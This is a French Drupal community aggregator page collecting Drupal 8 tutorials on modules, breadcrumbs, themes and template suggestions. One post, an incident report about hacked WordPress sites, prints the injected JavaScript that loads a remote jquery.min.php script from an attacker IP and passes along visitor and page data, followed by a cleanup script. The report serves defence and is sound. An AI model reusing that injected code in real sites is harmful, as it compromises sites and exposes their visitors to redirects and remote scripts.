Planète

Par flocondetoile
Adhérent

Utiliser la Cron API de Drupal 8

Nous avons vu dans un précédent billet comment nous pouvions générer automatiquement les styles d'images définis sur un site pour chaque image source téléversée. Nous allons poursuivre ce billet pour cette fois réaliser la même opération au moyen de la Cron API de Drupal 8, ce qui nous permet de désynchroniser ces opérations de masse, et qui donc peuvent être pénalisantes sur les performances ressenties, lors des actions réalisées par les utilisateurs.

Par Kgaut
Adhérent
Kevin Gautreau

Module Drupal 8 - CKEditor Responsive Plugin

Un peu d'auto-promotion pour commencer cette année 2017, je vais vous parler d'un de mes petits modules : CKEditor Responsive Plugin.

Ce module comme son nom l'indique est un plug-in pour CKEditor, qui permet d'ajouter des zones responsives dans une textarea afin de remplacer les tableaux.

Au lieu d'insérer du markup type table, ce plugin va insérer des divs avec des classes de dimensionnement assez comunes. Par exemple pour deux zones 50% voici ce qui sera inséré :

<div class="ckeditor-col-container clearfix">
  <div class="grid-6 sixcol first-col"><p>lorem ipsum</p></div>
  <div class="grid-6 sixcol last-col"><p>lorem ipsum</p></div>
</div>

À vous ensuite d'ajouter les propriétés et définitions nécessaires dans votre feuille de style front si besoin. Vous pouvez prendre exemple sur la css intégré au module (qui est utilisé dans l'éditeur.

Voci le fonctionnement du module : clic sur le bouton dans l'éditeur :

Sélection du template voulu :

Voici le résultat dans l'éditeur :

Ce module n'a pas du tout vocation à remplacer un module type paragraphs, mais il permet de laisser au client la possibilité de faire des mise en page avancées sans qu'il n'ai besoin de connaître le HTML ou de risquer de casser la mise en page.

Il est disponible pour Drupal 7 et Drupal 8.

Pour l'installation via composer :

composer require drupal/ckeditor_responsive_plugin

Ou bien en le téléchargeant directement sur la page du module : https://www.drupal.org/project/ckeditor_responsive_plugin

Par Kgaut
Adhérent
Kevin Gautreau

Module Drupal 8 - Geolocation Field

Geolocation field est un module Drupal 7 et 8 qui, comme son nom l'indique, permet d'ajouter un champs à ses types de contenus de type "Position GPS".

En backoffice on peut proposer une google map avec champ de recherche et l'administrateur pourra ainsi placer le pointeur précisement :

En front, différentes options d'affichage sont possibles :

Il est aussi possible de ne pas utiliser la google map fournie pour le front mais d'utiliser les données en brut et retourner du json par exemple si on a un ensemble de points à afficher sur une carte.

Pour l'installation, en passant par composer :

composer require drupal/geolocation

Ou bien en le téléchargeant directement sur la page du module : https://www.drupal.org/project/geolocation

Par flocondetoile
Adhérent

Générer des styles d'images automatiquement avec Drupal 8

Drupal 8 permet de générer des styles d'images selon de nombreux effets (réduction, découpe, noir et blanc, etc) pour chaque image téléversée. Vous pouvez avoir très rapidement de nombreux styles d'images, et d'autant plus si vous utilisez un rendu responsive pour celles-ci, permettant de proposer des dimensions différentes en fonction du terminal utilisé pour consulter votre site Internet.

Par flocondetoile
Adhérent

Générer des styles d'images automatiquement avec Drupal 8

Drupal 8 permet de générer des styles d'images selon de nombreux effets (réduction, découpe, noir et blanc, etc) pour chaque image téléversée. Vous pouvez avoir très rapidement de nombreux styles d'images, et d'autant plus si vous utilisez un rendu responsive pour celles-ci, permettant de proposer des dimensions différentes en fonction du terminal utilisé pour consulter votre site Internet.

Par admin

Grand sondage 2016 Drupal France

Nous nous connaissons (pour certains) depuis plusieurs années. Pour d'autres, nous sommes toujours en phase de prise de contact.
Alors comme nous aimons organiser et proposer des animations qui correspondent à vos envies, nous avons préparé un rapide sondage pour vous cerner un peu mieux.

Si vous avez quelques minutes, vos réponses nous aiderons beaucoup : https://framaforms.org/drupal-et-vous-en-2016-1479997661

Faites tourner : au bureau, au travail, en famille, avec vos clients, tous les profils sont intéressant et apporteront matière à formaliser des projets.

Merci à tous.

En page d'accueil : 
Par admin

Grand sondage 2016 Drupal France

Nous nous connaissons (pour certains) depuis plusieurs années. Pour d'autres, nous sommes toujours en phase de prise de contact.
Alors comme nous aimons organiser et proposer des animations qui correspondent à vos envies, nous avons préparé un rapide sondage pour vous cerner un peu mieux.

Si vous avez quelques minutes, vos réponses nous aiderons beaucoup : https://framaforms.org/drupal-et-vous-en-2016-1479997661

Faites tourner : au bureau, au travail, en famille, avec vos clients, tous les profils sont intéressant et apporteront matière à formaliser des projets.

Merci à tous.

En page d'accueil : 
Par Kgaut
Adhérent
Kevin Gautreau

Module Drupal 8 - Weight pour trier les contenus

Le module weight permet d'ajouter un attribut de "poids" au contenu qui peut être utilisé dans les listing pour les ordonner comme l'on veut.

La version 8 s'intègre très bien avec views et permet d'avoir un réordonnancent en backoffice sur un listing de contenu. (ce qui pouvait être obtenu sous drupal 7 avec la combinaison weight + draggable views)

Installation du module

"À l'ancienne" en téléchargeant la dernière version sur drupal.org : https://www.drupal.org/project/weight

ou via composer avec composer require drupal/weight.

La version 8.x-3.0 du module est sortie, mais à ce jour elle nécessite 3 patches pour fonctionner correctement :

Si vous utilisez composer pour gérer vos modules, voici la section à ajouter à votre fichier composer.json pour patcher le module automatiquement :

  // Dans la section "extra"      
  "patches": {
            "drupal/weight": {
                "Strict warning: Non-static method ": "https://www.drupal.org/files/issues/weight-non-static-method-2671844-3.patch",
                "Views widget assumes that weight field name is named 'field_weight'": "https://www.drupal.org/files/issues/weight-views-field-name-2687953-0.patch",
                "Weight selector missing": "https://www.drupal.org/files/issues/weight-show-selector-2671840-4.patch"
            }
        }

Plus d'informations sur la gestion des patchs via composer ici.

Configuration du tri

Première chose à faire, ajouter un champ de type "Poids" au type de contenu / entité que l'on souhaite trier :

Vous pourrez ensuite configurer le range qui par défaut est de 20 (donc possibilité de trier de -20 à +20) vous pouvez l'augmenter si vous avez beaucoup de contenu.

Maintenant nous allons utiliser créer une vue d'administration pour pouvoir "drag'n'droper" les contenus pour en changer le poids.

Il faut utiliser le format "Tableau" et bien penser à limiter au type de contenu que l'on souhaite trier :

Ajoutons aux champs, le champs "poids" que nous avons créé, afin d'avoir la petite flèche multidimensionnelle pour réordonner. Attention il faut bien prendre l'élément "Selector" si l'on sélectionne l'autre, alors on aura juste une cellule dans le tableau nous indiquant le poids du contenu, ce n'est pas ce que l'on veut ici :

Deuxième chose à faire, ajouter un critère de tri sur ce champ :

Évidement il faudra trier par poids croissant (un contenu avec un poids de -10 doit être placé avant celui qui a un poids de 10).

Réordonnez les critères de tri pour mettre le tri par poids en premier :

Enregistrez votre vue et rendez-vous sur la page crée, vous pouvez maintenant réordonner vos contenus comme vous le souhaiter, en pensant bien à enregistrer.

Enfin, pensez bien à modifier vos vues front pour prendre en compte le critère de tri maintenant existant (de la même façon que nous l'avons créé dans la vue backoffice.)

Par Kgaut
Adhérent
Kevin Gautreau

Drupal 8 - Définir un fil d'Ariane personnalisé

Drupal 8 améliore grandement la manière de gérer le fil d'Ariane (ou breadcrumbs en Anglais). Dans ce post nous allons voir comment définir un fil d'Ariane pour les contenus d'un type particulier.

Ici nous considérerons que :

  • Le type de contenu s'appellera "Témoignage", son nom machine sera "temoignage"
  • Mon module s'apelle "temoignages_module"
  • J'ai une page de listing définie par un controller dont la route sera temoignages.page_listing.

Ces éléments seront à adapter en fonction de vos besoins.

Définitions du service

S'il n'existe pas, créer le fichier temoignages_module.services.yml et ajouter le contenu suivant :

services:
  temoignages_module.breadcrumb.temoignage:
    class: Drupal\temoignages_module\Breadcrumb\TemoignagesBreadcrumb
    tags:
      - { name: breadcrumb_builder, priority: 100 }

Implémentation du service

Toujours dans le module, créer le fichier "TemoignagesBreadcrumb.php" dans le dossier : src/Breadcrumb du module temoignages_module, et y coller le contenu suivant :

<?php

namespace Drupal\temoignages_module\Breadcrumb;

use Drupal\Core\Breadcrumb\BreadcrumbBuilderInterface;
use Drupal\Core\Routing\RouteMatchInterface;
use Drupal\Core\Link;
use Drupal\Core\Breadcrumb\Breadcrumb;

class TemoignagesBreadcrumb implements BreadcrumbBuilderInterface {

  public function applies(RouteMatchInterface $route_match) {
    if ($route_match->getCurrentRouteMatch()->getRouteName() == 'entity.node.canonical') {
      $node = $route_match->getParameter('node');
      if ($node->getType() == 'temoignage') {
        return TRUE;
      }
    }
    return FALSE;
  }

  public function build(RouteMatchInterface $route_match) {
    $breadcrumb = new Breadcrumb();
    $breadcrumb->addCacheContexts(['route']);
    $links = [];
    $links[] = Link::createFromRoute(t('Home'), '<front>');
    $links[] = Link::createFromRoute(t('Tous les témoignages'), 'temoignages_module.page_listing');
    return $breadcrumb->setLinks($links);
  }
}

En détails

La première méthode applies doit retourner TRUE ou FALSE en fonction de si on est dans un cas ou notre breadcrumb personnalisé doit être appliqué.

Je vérifie pour commencer que je suis en train de visualiser une node :

$route_match->getCurrentRouteMatch()->getRouteName() == 'entity.node.canonical'

Si c'est le cas, je récupère cette node et si elle est bien du type "temoignage" je retourne TRUE

      $node = $route_match->getParameter('node');
      if ($node->getType() == 'temoignage') {
        return TRUE;
      }

Sinon je retourne FALSE.

Enfin, la méthode build, comme son nom l'indique construit le fil d'Ariane, qui consiste en fait en un tableau de liens.

Je commence par mettre un tag de cache à mon fil d'Ariane en lui disant qu'il dépend de la route.

$breadcrumb->addCacheContexts(['route']);

Je construis ensuite mon tableau de liens, qui en sera constitué de deux, le premier vers la page d'accueil et le second vers ma page de listing :

    $links = [];
    $links[] = Link::createFromRoute(t('Home'), '<front>');
    $links[] = Link::createFromRoute(t('Tous les témoignages'), 'temoignages_module.page_listing');
    return $breadcrumb->setLinks($links);

Et... c'est tout, plus qu'à reconstruire le cache et vous pourrez vérifier que votre fil d'Ariane fonctionne bien

Vous trouverez plus d'exemple dans les sources de mon module de pronostics : https://github.com/mespronos/mespronos/tree/8.x-1.x/src/Breadcrumb, pour la définitions des services liés, c'est ici : https://github.com/mespronos/mespronos/blob/8.x-1.x/mespronos.services.yml.

Par vincent59
Vincent Liefooghe

Hack de sites Wordpress avec jquery.min.php

Depuis quelques jours, je recevais des mails de monit, indiquant un load average trop élevé sur un serveur dont je m'occupe épisodiquement (serveur de l'association Down Up).Cela m'a semblé curieux, car il  s'agit d'un serveur dédié OVH, avec un Xeon 8 coeurs, et 64 Go de RAM, qui héberge uniquement quelques sites web.Ayant eu dans le temps des problèmes de piratage de sites, j'ai regardé le nombre de messages dans la file postfix :
mailq

Oups ! plus de 23 000 messages en attente, rejetés par les plates-formes cibles.Dans les messages, le nom de l'un des sites apparaît. Il s'agit d'un Wordpress, dans une version assez ancienne. Dans les différents répertoire, on découvre des fichiers php infectés, traînant un peu partout, avec la même date : 16 novembre. Ce qui veut dire que depuis plusieurs jours, la machine est infectée.Je supprime les fichiers php infectés, et teste l'accès au site, qui semble fonctionner, mais qui redirige vers  des sites pour adultes...En y regardant plus précisément, d'autres sites ont le même comportement, alors qu'aucun nouveau fichier ne date de novembre ; pas de fichiers curieux non plus.Une recherche sur Google me donne quelques pistes. Je fouille également dans mes cookies, pour découvrir un cookie nommé __cfgoid. La recherche dans les fichiers de Wordpress me sort tous les fichiers header.php des thèmes.Une ligne de javascript a été insérée dans les fichiers : 


<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCS
tring();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(va
r e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__
cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascr
ipt" src="/%27%20%2B%20%27http%3A//80.90.43.202/js/jquery.min.php%27%20%2B%20%27?key=b64%27%20%20%20%27&utm_campaign=%27%20%20%20%27snt2014%27%20%20%20%27&utm_source=%27%20%20%20window.location_.host%20%20%20%27&utm_medium=%27%20%20%20%27&utm_content=%27%20%20%20window.location%20%20%20%27&utm_term=%27%20%20%20encodeURIComponent%28%28%28k%3D%28function%28%29%7Bvar%20keywords%20%3D%20%27%27%3Bvar_%20metas%20%3D%20document.getElementsByTagName%28%27meta%27%29%3Bif%20%28metas%29%20%7Bfor%20%28var%20x%3D0%2Cy%3Dmetas.length%3B%20x%3Cy%3B%20x%20%20%29%20%7Bif%20%28metas%5Bx%5D.name.toLowerCase%28%29%20%3D_%3D%20"keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(
/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><'
+ '/script>')));</script>
</head>

Il suffit de supprimer la ligne pour nettoyer les entêtes. J'ai développé pour cela un script shell de quelques lignes :

#!/bin/bash
# Recherche les fichiers infectes
BADFILE=$(grep -lR jquery.min.php *)
#
# pour chacun
for fic in $BADFILE ; do
  echo === Traitement de $fic ===
  echo sed -i.bak '/cfgoid/d' $fic
  sed -i.bak '/cfgoid/d' $fic
done

Le script recherche d'abord la chaine jquery.min.php dans tous les fichiers des sous-répertoires, puis pour chacun supprime la ligne contenant le nom du cookie.Un arrêt / relance du serveur http Apache permet de vider le cache php...Après nettoyage, je vais modifier les permissions pour interdire l'écriture dans les répertoires de thèmes Wordpress.Le fait que les fichiers php puissent être utilisés un peu partout dans Wordpress ne rendent pas les choses faciles.Si on compare à Drupal, dans ce dernier, seul le fichier index.php doit être appelé directement. L'appel d'un autre script php peut donc être refusé, ce qu'on fait facilement avec des règles nginx...      

Catégorie: 


Tag: 

Par Kgaut
Adhérent
Kevin Gautreau

Créer un thème personnalisé pour Drupal 8

Quand l'on travaille avec Drupal, on a rapidement besoin d'avoir un thème personnalisé ne serai-ce que pour y stocker ses templates custom et ses feuilles de styles.

Personnellement, j'ai l'habitude de faire un thème "front" et un thème "back" car j'ai souvent besoin de personnaliser le rendu de l'interface d'administration pour qu'elle convienne au mieux à mes clients.

Drupal 8 comme Drupal 7 utilise la notion de thème "parent", c'est à dire que si mon thème custom a comme parent (comme base_theme) le thème bartik, alors il reprendra toutes ses propriétés (templates, css, js...), et l'on pourra surcharger ce qui nous intéresse.

Il existe des thèmes "starter kit", on peut citer Zen (https://www.drupal.org/project/zen) par exemple qui est un des plus connu. Il s'agit en fait d'un thème parent qui propose un thème starterkit tout configuré que l'on peut ensuite personnaliser en fonction de nos besoins.

On peut aussi évidement faire ses propres thèmes custom. À noter que si vous ne prenez pas comme thème parent Bartik ou Zen, il faudra quand même prendre le thème "classy" comme parent.

Comment créer son theme ?

On va partir sur le nom de theme suivant "Mon Site Front" : on va commencer par créer le dossier mon_site_front dans le dossier /themes/custom (on pourrait le mettre directement dans /themes, mais comme pour les modules c'est une bonne pratique de différentier les élément personnalisé (custom) des éléments téléchargés (qui seront eux dans un sous-dossier "contrib").

La définition d'un thème passe, comme pour un module par un fichier mon_site_front.info.yml, en voici son contenu :

name: Mon Site Front
type: theme
description: Mon theme de demonstration
package: MonSite
core: 8.x
base theme: bartik

On doit aussi créer un fichier mon_site_front.theme, vide, qui pourra contenir plus tard nos fonction de preprocess et différents hooks.

J'ai ici pris comme thème de base "Bartik".

Une fois cela fait on passe dans le menu d'administration "Apparence" pour activer notre thème et le définir comme thème par défaut :

Pour faire un thème d'administration custom cette fois on va prendre comme base thème "Seven" :

name: Mon Site Back
type: theme
description: Mon theme de demonstration Backoffice
package: MonSite
core: 8.x
base theme: seven

Cette fois dans le menu Apparence, on devra installer le thème puis le définir comme thème d'administration :

Un thème d’administration que je trouve très sympa et qui me sert de thème parent est Adminimal (https://www.drupal.org/project/adminimal_theme).

Drupal Console permet aussi de générer des thème, via la commande drupal generate:theme, et il demande de quel thème parent notre thème custom doit hériter.

Vous pouvez retrouver les maigres sources de ce post sur github :

Par Kgaut
Adhérent
Kevin Gautreau

Module Drupal 8 - Field Group

Avec un contenu personnalisé dans drupal, on peut rapidement se retrouver avec des dizaines et des dizaines de champs dans le formulaire de création de contenu. Field Group est un module drupal 7 et 8 qui permet de les réorganiser, via l'interface d'administration en "groupes", qui peuvent être au choix, des fieldset, des onglets, des acordéons... et ainsi avoir un formulaire plus propre et plus clair pour celui qui devra ensuite créer/modifier les contenus.

Ainsi, dans l'exemple suivant, j'ai créé un groupe qui sera le conteneur de mes deux onglets (il y en a trois en réalité mais je ne voulais pas faire un screenshot de 15km de haut)

 

Et voici le rendu sur le formulaire de création de contenu :

et quand on sélectionne un autre onglet :

Bref, un module indispensable quand l'on veut faire des formulaires bien propres ! Mais il permet aussi de faire des groupes de champs pour l'affichage en front.

La page du module : https://www.drupal.org/project/field_group

Installation avec composer :

composer require drupal/field_group

 

Par Artusamak
Julien Dubois

Les nouveautés de Drupal 8.1.0

Les nouveautés de Drupal 8.1.0

DuaelFr
lun 28/11/2016 - 09:30

Mieux vaut tard que jamais. Avec le nouveau modèle de numérotation des versions de Drupal est apparue la possibilité d'ajouter des fonctionnalités pendant la vie d'une version majeure. Alors que nous fêtons le premier anniversaire de Drupal 6 et que Drupal 8.1.0 a déjà plus de 6 mois, il est plus que temps de faire le point sur les nouveautés que cette version a apporté pour la plupart sous la forme de modules expérimentaux.

BigPipe

Il y a 8 mois de ça, dans mon article sur l'incroyable cache de Drupal 8, j'évoquais déjà l'existence du module BigPipe, inspiré de la technique inventée par Facebook pour permettre aux utilisateurs de voir un premier rendu de la page, même incomplet, bien plus rapidement et ainsi avoir la sensation que le site se charge plus rapidement. En deux mots, cette technique repose sur le fait de remplacer les parties de la page complexes à calculer par des espaces vides et de les remplacer à la volée après que le contenu principal a été chargé.

La grande nouveauté à propos de ce module est simplement qu'il a été intégré dans le cœur de Drupal et permet donc à tou⋅te⋅s les courageux/ses d'en bénéficier à leurs risques et périls.

Inline Form Errors

Afin de satisfaire les exigences de la norme WCAG en terme d'accessibilité, Drupal a fait le choix de rassembler toutes les erreurs survenues à la soumission d'un formulaire dans un seul message en haut de page. En effet, il est important pour les personnes souffrant de problèmes visuels et utilisant un lecteur d'écran d'avoir un point d'entrée unique pour comprendre pourquoi leur soumission ne s'est pas déroulée comme prévu. Pour les personnes n'ayant pas ce type de problème, l'ergonomie de ce rassemblement de messages laisse à désirer car il est difficile de comprendre le contexte lié aux erreurs.

Avec Inline Form Errors il est désormais possible de proposer des messages ciblés tout en maintenant l'accessibilité. Ce module dispose chaque message à proximité du champ ayant généré l'erreur et utilise la zone centralisée, destinée aux malvoyants, pour afficher un message d'erreur générique pourvu de liens renvoyant vers chaque champ à corriger.

Illustration des différences entre les erreurs sans et avec le module Inline Form Errors

Migrate, Migrate Drupal et  Migrate Drupal UI

Note : Migrate Drupal UI s'appelait à l'origine Drupal Upgrade UI mais a été renommé pour des raisons de cohérence.

L'une des promesses du développement de Drupal 8 était de permettre de simplifier la mise à jour d'un site en Drupal 6 ou 7 vers Drupal 8. Malheureusement, la complexité d'une telle tâche n'a pas permis aux contributeurs de fournir les outils nécessaires à temps pour la sortie de la version stable. Tout d'abord, en lieu et place de l'ancienne méthode de montée de version, il a été décidé de s'appuyer sur le module Migrate, présent dans l'écosystème depuis déjà plusieurs années, en l'étendant pour qu'il soit en mesure de traiter nativement toutes les données nécessaires. 

Avec Drupal 8.1.0, les équipes de développement du cœur ont enfin eu le temps de finaliser une première version de ces outils et de les intégrer. Cette suite de modules sert donc de socle aux équipes de développement et permet même de convertir la configuration et le contenu d'un site très simple sans une ligne de code. En prime, la présence de Migrate dans le cœur permet également de procéder à des imports de contenus venant d'autres sources comme d'un autre CMS ou d'une base de données indépendante. Dans ce dernier cas, on s'appuiera volontiers sur des modules contribués comme Migrate Source CSV, Migrate Plus et Migrate Tools pour aller encore plus loin.

Pour en savoir plus, vous pouvez consulter le replay du webinar sur les problématiques liées à la migration de contenu et à la montée de version que nous avons tenu par deux fois en collaboration avec Kaliop.

Capture d'écran de la page de récapitulatif des capacités de migration pour un projet donné

Autres améliorations diverses

Outre ces quelques modules expérimentaux, le reste des fonctionnalités de Drupal a continué d'évoluer afin de proposer des nouveautés qui, même si elles semblent parfois minuscules, contribuent à se rapprocher des besoins de notre industrie.

Choix de la langue lors de l'installation

Cette fonctionnalité qui devait être présente dès Drupal 8.0.0 avait été désactivée en raison d'un trop grand nombre de bugs. Depuis Drupal 8.1.0 il est donc possible d'installer Drupal directement dans une autre langue que l'anglais, en profitant des traductions de la communauté.

Choix de la langue dans l'éditeur de texte riche

Certains sites jonglent dans une même page entre plusieurs langues. Dans le but de satisfaire aux exigences des normes d'accessibilité, il est important de pouvoir spécifier qu'une partie du contenu est dans une autre langue que la page. Ce nouveau plugin pour l'éditeur de texte riche propose de choisir la langue du texte en cours de frapper via un menu déroulant.

Capture d'écran du sélecteur de langue de l'éditeur de texte riche

Correction orthographique dans l'éditeur de texte riche

Les éditeurs de texte riche étant de petites applications, elles regorgent d'options. Cette modification est l'une des plus petites réalisées dans cette nouvelle version mais son impact est sensible. En 2 lignes de code il s'agit de permettre au navigateur d'accéder au texte inscrit dans l'éditeur pour y appliquer son système de correction orthographique.

Capture d'écran du correcteur orthographique dans l'éditeur de texte riche

Évolutions à destination des développeurs

Bien évidemment, outre les évolutions fonctionnelles, Drupal a aussi beaucoup avancé du point de vue du code et de l'expérience développeur (DX). Voici une petite liste non exhaustive des nouveautés que l'on peut retrouver dans cette version :

 

À suivre avec les nouveautés de la version 8.2.0… dans moins de 6 mois c'est promis ;)

 

Photo de couverture © Frank Taillandier

Par flocondetoile
Adhérent

Créer des formulaires facilement avec Drupal 8

Nous disposons de plusieurs solutions avec Drupal 8 pour concrétiser, sans déboire, tout type de formulaire : du simple formulaire de contact au formulaire conditionnel multi-étapes. Vous trouverez dans ce billet la présentation faite sur les solutions disponibles, avec un focus particulier sur YAML Form, lors du meetup Drupal Lyon du 17 novembre 2016.

Par flocondetoile
Adhérent

Créer des formulaires facilement avec Drupal 8

Nous disposons de plusieurs solutions avec Drupal 8 pour concrétiser, sans déboire, tout type de formulaire : du simple formulaire de contact au formulaire conditionnel multi-étapes. Vous trouverez dans ce billet la présentation faite sur les solutions disponibles, avec un focus particulier sur YAML Form, lors du meetup Drupal Lyon du 17 novembre 2016.

Par Kgaut
Adhérent
Kevin Gautreau

Les suggestions de templates dans Drupal 8

Ça n'est pas une nouveauté de Drupal 8, toute partie d'une page d'une page est rendue avec un template.

Il existe un paquet de templates de base :

  • html.html.twig qui s'occupe de rendre le doctype, le contenu de la balise <head> et qui ouvre et ferme la balise <body>
  • page.html.twig lui commence là où html.html.twig s'arrête, c'est a dire l'intérieur de la balise body
  • region.html.twig pour le contenu d'une région (header, footer, content... bref les régions définie dans notre theme)
  • node.html.twig pour le contenu d'une node
  • field.html.twig pour un champ défini dans un type de contenu ou une entité
  • block.html.twig pour les blocks...

Si on prend comme exemple le template node.html.twig qui est donc utilisé pour afficher l'ensemble des noeuds (page, article...)

On peut rendre ces templates plus spécifiques, si on veut par exemple un template spécial pour les noeuds de type "article" on peut copier le fichier node.html.twig en node--article.html.twig.

Il existe aussi d'autres suggestions :

  • node--NID.html.twig en substituant NID par l'id du noeud en question
  • node--VIEW_MODE.html.twig pour utiliser un template différent si on affiche le noeud en mode "teaser" ou "full"
  • ...

On peut connaitre facilement les noms de de template possible pour un élément en activant le debug de twig et en regardant le code html de notre page :

Les suggestions de templates dans le code html

Les éléments préfixés par * sont les noms de template possible, celui préfixé par x est celui effectivement utilisé, ce sont les suggestions de template (ou template suggestions). Il en existe un paquet de base qui suffisent dans la plupart des cas, mais on peut aussi vouloir définir un template plus spécifique.

Définir sa propre suggestion de template

Pour drupal 7 on utilisait pour ça le HOOK_preprocess_HOOK, dans drupal 8 deux hooks ont étés créés : HOOK_theme_suggestions_HOOK et HOOK_theme_suggestions_HOOK_alter.

Le premier "HOOK" doit être remplacé par le nom de notre module qui implémente le hook, le second par le nom de l'élément pour lequel on veut ajouter une suggestion.

Si on a un module qui s'appelle "mon_module" et que l'on veut ajouter une suggestion de template pour les noeuds (node) alors on définira la fonction suivante :

function mon_module_theme_suggestions_node_alter(array &$suggestions, array $variables) {
  //...
}

cette fonction devra ajouter au tableau "suggestions" les nouvelles possibilités, par exemple :

function mon_module_theme_suggestions_node_alter(array &$suggestions, array $variables) {
  $suggestions[] = 'node__montemplate';
}

Note : quand on définit une suggestion de template dans le code il faut bien remplacer les "--" par des "__"

ainsi :

Le HOOK_theme_suggestions_HOOK ne fonctionne pas pour les nodes (pour une raison que j'ignore et je suis prenneur d'une explication, mais qui fonctionne pour les autres éléments.

Si on veut un template html spécifique pour le type de contenu :

function monmodule_theme_suggestions_html(array $variables) {
  $path_args = explode('/', Url::fromRoute('<current>')->getInternalPath());
  $suggestions = [];
  if(count($path_args) >=2 && $path_args[0] == 'node' && $node = Node::load($path_args[1])) {
    $suggestions[] = 'html__' .$node->getType();
  }
  return $suggestions;
}

La même chose pour "page" :

function slides_core_theme_suggestions_page(array $variables) {
  $path_args = explode('/', Url::fromRoute('<current>')->getInternalPath());
  $suggestions = [];
  if(count($path_args) >=2 && $path_args[0] == 'node' && $node = Node::load($path_args[1])) {
    $suggestions[] = 'page__' .$node->getType();
  }
  return $suggestions;
}

et pour "region" :

function slides_core_theme_suggestions_region(array $variables) {
  $path_args = explode('/', Url::fromRoute('<current>')->getInternalPath());
  $suggestions = [];
  if(count($path_args) >=2 && $path_args[0] == 'node' && $node = Node::load($path_args[1])) {
    $suggestions[] = $variables['theme_hook_original'].'__'.$variables['elements']['#region'].'__' .$node->getType();
  }
  return $suggestions;
}

note : j'ai ici utilisé la variable $variables['theme_hook_original'] qui contient le prefixe que l'on doit utiliser pour chaque template (ici "region"), la variable $variables['elements']['#region'] contient elle le nom de la région.

Voici les templates disponibles ainsi pour la région "header" quand on visualise un contenu de type "article" :

Évidement il est possible d'ajouter plusieurs suggestions pour un même élément.

 

Pages